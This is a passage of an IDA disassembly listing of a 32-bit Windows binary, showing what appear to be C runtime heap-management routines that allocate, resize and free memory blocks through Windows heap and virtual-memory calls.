mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_4052C3
mov ebx, esi
loc_4052C3: ; CODE XREF: sub_4051C5+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_4052D5
mov edx, esi
loc_4052D5: ; CODE XREF: sub_4051C5+10C�j
cmp ebx, edx
jz short loc_405337
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_40531F
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_405305
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_40531F
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_40531F
; ---------------------------------------------------------------------------
loc_405305: ; CODE XREF: sub_4051C5+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_40531F
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_40531F: ; CODE XREF: sub_4051C5+11D�j
; sub_4051C5+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_405337: ; CODE XREF: sub_4051C5+112�j
mov esi, [ebp+arg_4]
jmp short loc_40533F
; ---------------------------------------------------------------------------
loc_40533C: ; CODE XREF: sub_4051C5+E2�j
mov ebx, [ebp+arg_0]
loc_40533F: ; CODE XREF: sub_4051C5+175�j
cmp [ebp+var_C], 0
jnz short loc_40534D
cmp ebx, edx
jz loc_4053CD
loc_40534D: ; CODE XREF: sub_4051C5+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_4053CD
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_4053A4
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405393
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_405393: ; CODE XREF: sub_4051C5+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_4053CD
; ---------------------------------------------------------------------------
loc_4053A4: ; CODE XREF: sub_4051C5+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4053BA
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4053BA: ; CODE XREF: sub_4051C5+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_4053CD: ; CODE XREF: sub_4051C5+182�j
; sub_4051C5+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_4054D4
mov eax, dword_411578
test eax, eax
jz loc_4054C6
mov ecx, dword_413BA0
mov esi, dword_40D134
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_413BA0
mov eax, dword_411578
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_411578
mov eax, [eax+10h]
mov ecx, dword_413BA0
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_411578
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_411578
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_40545B
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_411578
loc_40545B: ; CODE XREF: sub_4051C5+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4054C6
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_411578
push dword ptr [eax+10h]
push 0
push dword_41157C
call dword_40D0FC ; RtlFreeHeap
mov ecx, dword_413B8C
mov eax, dword_411578
imul ecx, 14h
mov edx, dword_413B90
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_409400
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_413B8C
cmp eax, dword_411578
jbe short loc_4054BC
sub [ebp+arg_0], 14h
loc_4054BC: ; CODE XREF: sub_4051C5+2F1�j
mov eax, dword_413B90
mov dword_413B98, eax
loc_4054C6: ; CODE XREF: sub_4051C5+223�j
; sub_4051C5+29A�j
mov eax, [ebp+arg_0]
mov dword_411578, eax
mov dword_413BA0, edi
loc_4054D4: ; CODE XREF: sub_4051C5+216�j
pop ebx
loc_4054D5: ; CODE XREF: sub_4051C5+37�j
pop edi
pop esi
leave
retn
sub_4051C5 endp
; =============== S U B R O U T I N E =======================================
sub_4054D9 proc near ; CODE XREF: sub_40596E+C0�p
mov eax, dword_413B9C
push esi
mov esi, dword_413B8C
push edi
xor edi, edi
cmp esi, eax
jnz short loc_405520
add eax, 10h
imul eax, 14h
push eax
push dword_413B90
push edi
push dword_41157C
call dword_40D13C ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_40550E
loc_40550A: ; CODE XREF: sub_4054D9+68�j
; sub_4054D9+94�j
xor eax, eax
jmp short loc_405586
; ---------------------------------------------------------------------------
loc_40550E: ; CODE XREF: sub_4054D9+2F�j
add dword_413B9C, 10h
mov esi, dword_413B8C
mov dword_413B90, eax
loc_405520: ; CODE XREF: sub_4054D9+11�j
imul esi, 14h
add esi, dword_413B90
push 41C4h
push 8
push dword_41157C
call dword_40D0F8 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_40550A
push 4
push 2000h
push 100000h
push edi
call dword_40D138 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40556F
push dword ptr [esi+10h]
push edi
push dword_41157C
call dword_40D0FC ; RtlFreeHeap
jmp short loc_40550A
; ---------------------------------------------------------------------------
loc_40556F: ; CODE XREF: sub_4054D9+82�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_413B8C
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_405586: ; CODE XREF: sub_4054D9+33�j
pop edi
pop esi
retn
sub_4054D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405589 proc near ; CODE XREF: sub_40596E+D6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_4055A1
; ---------------------------------------------------------------------------
loc_40559E: ; CODE XREF: sub_405589+1A�j
add eax, eax
inc ebx
loc_4055A1: ; CODE XREF: sub_405589+13�j
test eax, eax
jge short loc_40559E
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_4055BA: ; CODE XREF: sub_405589+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4055BA
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call dword_40D138 ; VirtualAlloc
test eax, eax
jnz short loc_4055ED
or eax, 0FFFFFFFFh
jmp loc_40568A
; ---------------------------------------------------------------------------
loc_4055ED: ; CODE XREF: sub_405589+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_40563D
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_405605: ; CODE XREF: sub_405589+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_405605
mov edx, [ebp+var_4]
loc_40563D: ; CODE XREF: sub_405589+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40567A
or [eax+4], edi
loc_40567A: ; CODE XREF: sub_405589+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40568A: ; CODE XREF: sub_405589+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_405589 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40568F proc near ; CODE XREF: sub_40B7A2+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_405831
test bl, 1
jnz loc_40582A
add ebx, ecx
cmp esi, ebx
jg loc_40582A
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_405704
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_405704: ; CODE XREF: sub_40568F+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_40574F
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_405730
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_40574F
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_40574F
; ---------------------------------------------------------------------------
loc_405730: ; CODE XREF: sub_40568F+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_40574F
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_40574F: ; CODE XREF: sub_40568F+7B�j
; sub_40568F+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_405818
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_405789
push 3Fh
pop edi
loc_405789: ; CODE XREF: sub_40568F+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_405806
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_4057DD
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_4057D5
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_4057D5: ; CODE XREF: sub_40568F+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_4057FD
; ---------------------------------------------------------------------------
loc_4057DD: ; CODE XREF: sub_40568F+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_4057F3
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4057F3: ; CODE XREF: sub_40568F+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_4057FD: ; CODE XREF: sub_40568F+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_405806: ; CODE XREF: sub_40568F+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_40581B
; ---------------------------------------------------------------------------
loc_405818: ; CODE XREF: sub_40568F+DE�j
mov edx, [ebp+arg_4]
loc_40581B: ; CODE XREF: sub_40568F+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_405966
; ---------------------------------------------------------------------------
loc_40582A: ; CODE XREF: sub_40568F+50�j
; sub_40568F+5A�j
xor eax, eax
jmp loc_405969
; ---------------------------------------------------------------------------
loc_405831: ; CODE XREF: sub_40568F+47�j
jge loc_405966
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_40585C
push 3Fh
pop esi
loc_40585C: ; CODE XREF: sub_40568F+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_4058E6
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_405875
push 3Fh
pop esi
loc_405875: ; CODE XREF: sub_40568F+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_4058BF
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_4058A0
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_4058BC
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4058BC
; ---------------------------------------------------------------------------
loc_4058A0: ; CODE XREF: sub_40568F+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4058BC
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4058BC: ; CODE XREF: sub_40568F+208�j
; sub_40568F+20F�j ...
mov ebx, [ebp+arg_4]
loc_4058BF: ; CODE XREF: sub_40568F+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4058E6
push 3Fh
pop esi
loc_4058E6: ; CODE XREF: sub_40568F+1D1�j
; sub_40568F+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_40595D
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_405934
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_40592C
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_40592C: ; CODE XREF: sub_40568F+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_405954
; ---------------------------------------------------------------------------
loc_405934: ; CODE XREF: sub_40568F+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_40594A
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_40594A: ; CODE XREF: sub_40568F+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_405954: ; CODE XREF: sub_40568F+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_40595D: ; CODE XREF: sub_40568F+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_405966: ; CODE XREF: sub_40568F+196�j
; sub_40568F:loc_405831�j
xor eax, eax
inc eax
loc_405969: ; CODE XREF: sub_40568F+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40568F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40596E proc near ; CODE XREF: sub_403AC8+28�p
; sub_40B684+88�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_413B8C
mov ecx, [ebp+arg_0]
imul eax, 14h
add eax, dword_413B90
add ecx, 17h
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
push ebx
dec ecx
cmp ecx, 20h
push esi
push edi
jge short loc_4059A5
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_4059B2
; ---------------------------------------------------------------------------
loc_4059A5: ; CODE XREF: sub_40596E+2A�j
add ecx, 0FFFFFFE0h
or edx, 0FFFFFFFFh
xor esi, esi
shr edx, cl
mov [ebp+var_8], edx
loc_4059B2: ; CODE XREF: sub_40596E+35�j
mov ecx, dword_413B98
mov ebx, ecx
jmp short loc_4059CD
; ---------------------------------------------------------------------------
loc_4059BC: ; CODE XREF: sub_40596E+64�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_4059D4
add ebx, 14h
loc_4059CD: ; CODE XREF: sub_40596E+4C�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_4059BC
loc_4059D4: ; CODE XREF: sub_40596E+5A�j
cmp ebx, eax
jnz short loc_405A57
mov ebx, dword_413B90
jmp short loc_4059F1
; ---------------------------------------------------------------------------
loc_4059E0: ; CODE XREF: sub_40596E+88�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_4059F8
add ebx, 14h
loc_4059F1: ; CODE XREF: sub_40596E+70�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_4059E0
loc_4059F8: ; CODE XREF: sub_40596E+7E�j
cmp ebx, ecx
jnz short loc_405A57
jmp short loc_405A0A
; ---------------------------------------------------------------------------
loc_4059FE: ; CODE XREF: sub_40596E+9E�j
cmp dword ptr [ebx+8], 0
jnz short loc_405A0E
add ebx, 14h
mov [ebp+arg_0], ebx
loc_405A0A: ; CODE XREF: sub_40596E+8E�j
cmp ebx, eax
jb short loc_4059FE
loc_405A0E: ; CODE XREF: sub_40596E+94�j
cmp ebx, eax
jnz short loc_405A43
mov ebx, dword_413B90
jmp short loc_405A23
; ---------------------------------------------------------------------------
loc_405A1A: ; CODE XREF: sub_40596E+BA�j
cmp dword ptr [ebx+8], 0
jnz short loc_405A2A
add ebx, 14h
loc_405A23: ; CODE XREF: sub_40596E+AA�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_405A1A
loc_405A2A: ; CODE XREF: sub_40596E+B0�j
cmp ebx, ecx
jnz short loc_405A43
call sub_4054D9
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jnz short loc_405A43
loc_405A3C: ; CODE XREF: sub_40596E+E7�j
xor eax, eax
jmp loc_405C4C
; ---------------------------------------------------------------------------
loc_405A43: ; CODE XREF: sub_40596E+A2�j
; sub_40596E+BE�j ...
push ebx
call sub_405589
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_405A3C
loc_405A57: ; CODE XREF: sub_40596E+68�j
; sub_40596E+8C�j
mov dword_413B98, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_405A7E
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_405AA7
loc_405A7E: ; CODE XREF: sub_40596E+FA�j
and [ebp+var_4], 0
mov edx, [eax+0C4h]
lea ecx, [eax+44h]
loc_405A8B: ; CODE XREF: sub_40596E+134�j
mov edi, [ecx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_405AA4
inc [ebp+var_4]
mov edx, [ecx+84h]
add ecx, 4
jmp short loc_405A8B
; ---------------------------------------------------------------------------
loc_405AA4: ; CODE XREF: sub_40596E+126�j
mov edx, [ebp+var_4]
loc_405AA7: ; CODE XREF: sub_40596E+10E�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_405AD5
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_405AD5
; ---------------------------------------------------------------------------
loc_405AD2: ; CODE XREF: sub_40596E+169�j
add ecx, ecx
inc edi
loc_405AD5: ; CODE XREF: sub_40596E+153�j
; sub_40596E+162�j
test ecx, ecx
jge short loc_405AD2
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_405AF6
push 3Fh
pop esi
loc_405AF6: ; CODE XREF: sub_40596E+183�j
cmp esi, edi
jz loc_405BFF
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_405B62
cmp edi, 20h
mov ebx, 80000000h
jge short loc_405B36
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_405B5F
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_405B62
; ---------------------------------------------------------------------------
loc_405B36: ; CODE XREF: sub_40596E+1A0�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_405B5F
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_405B62
; ---------------------------------------------------------------------------
loc_405B5F: ; CODE XREF: sub_40596E+1BC�j
; sub_40596E+1E4�j
mov ebx, [ebp+arg_0]
loc_405B62: ; CODE XREF: sub_40596E+196�j
; sub_40596E+1C6�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_405C0B
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_405BFC
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_405BD3
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_405BC1
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_405BC1: ; CODE XREF: sub_40596E+246�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_405BFC
; ---------------------------------------------------------------------------
loc_405BD3: ; CODE XREF: sub_40596E+240�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_405BE6
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_405BE6: ; CODE XREF: sub_40596E+269�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_405BFC: ; CODE XREF: sub_40596E+22E�j
; sub_40596E+263�j
mov ecx, [ebp+var_8]
loc_405BFF: ; CODE XREF: sub_40596E+18A�j
test ecx, ecx
jz short loc_405C0E
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_405C0E
; ---------------------------------------------------------------------------
loc_405C0B: ; CODE XREF: sub_40596E+20A�j
mov ecx, [ebp+var_8]
loc_405C0E: ; CODE XREF: sub_40596E+293�j
; sub_40596E+29B�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_405C44
cmp ebx, dword_411578
jnz short loc_405C44
mov ecx, [ebp+var_4]
cmp ecx, dword_413BA0
jnz short loc_405C44
and dword_411578, 0
loc_405C44: ; CODE XREF: sub_40596E+2BA�j
; sub_40596E+2C2�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_405C4C: ; CODE XREF: sub_40596E+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40596E endp
; ---------------------------------------------------------------------------
align 4
; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405CAD proc near ; CODE XREF: sub_405D08:loc_405D2B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
lea eax, [ebp+var_4]
xor esi, esi
push eax
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_4042D8
test eax, eax
pop ecx
jz short loc_405CD6
push esi
push esi
push esi
push esi
push esi
call sub_404D8F
add esp, 14h
loc_405CD6: ; CODE XREF: sub_405CAD+1A�j
lea eax, [ebp+var_8]
push eax
call sub_40430F
test eax, eax
pop ecx
jz short loc_405CF1
push esi
push esi
push esi
push esi
push esi
call sub_404D8F
add esp, 14h
loc_405CF1: ; CODE XREF: sub_405CAD+35�j
cmp [ebp+var_4], 2
pop esi
jnz short loc_405D03
cmp [ebp+var_8], 5
jb short loc_405D03
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_405D03: ; CODE XREF: sub_405CAD+49�j
; sub_405CAD+4F�j
push 3
pop eax
leave
retn
sub_405CAD endp
; =============== S U B R O U T I N E =======================================
sub_405D08 proc near ; CODE XREF: seg001:00404C6C�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call dword_40D144 ; HeapCreate
test eax, eax
mov dword_41157C, eax
jnz short loc_405D2B
loc_405D28: ; CODE XREF: sub_405D08+54�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_405D2B: ; CODE XREF: sub_405D08+1E�j
call sub_405CAD
cmp eax, 3
mov dword_413B88, eax
jnz short loc_405D5E
push 3F8h
call sub_405152
test eax, eax
pop ecx
jnz short loc_405D5E
push dword_41157C
call dword_40D140 ; HeapDestroy
and dword_41157C, 0
jmp short loc_405D28
; ---------------------------------------------------------------------------
loc_405D5E: ; CODE XREF: sub_405D08+30�j
; sub_405D08+3F�j
xor eax, eax
inc eax
retn
sub_405D08 endp
; =============== S U B R O U T I N E =======================================
sub_405D62 proc near ; CODE XREF: sub_403B17+2A�p
; sub_40422F+9�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
xor esi, esi
xor edi, edi
loc_405D6E: ; CODE XREF: sub_405D62+19�j
cmp ebx, dword_410708[edi*8]
jz short loc_405D7D
inc edi
cmp edi, 17h
jb short loc_405D6E
loc_405D7D: ; CODE XREF: sub_405D62+13�j
cmp edi, 17h
jnb loc_405EFD
push ebp
push 3
call sub_409A46
cmp eax, 1
pop ecx
jz loc_405EC9
push 3
call sub_409A46
test eax, eax
pop ecx
jnz short loc_405DB1
cmp dword_4105D0, 1
jz loc_405EC9
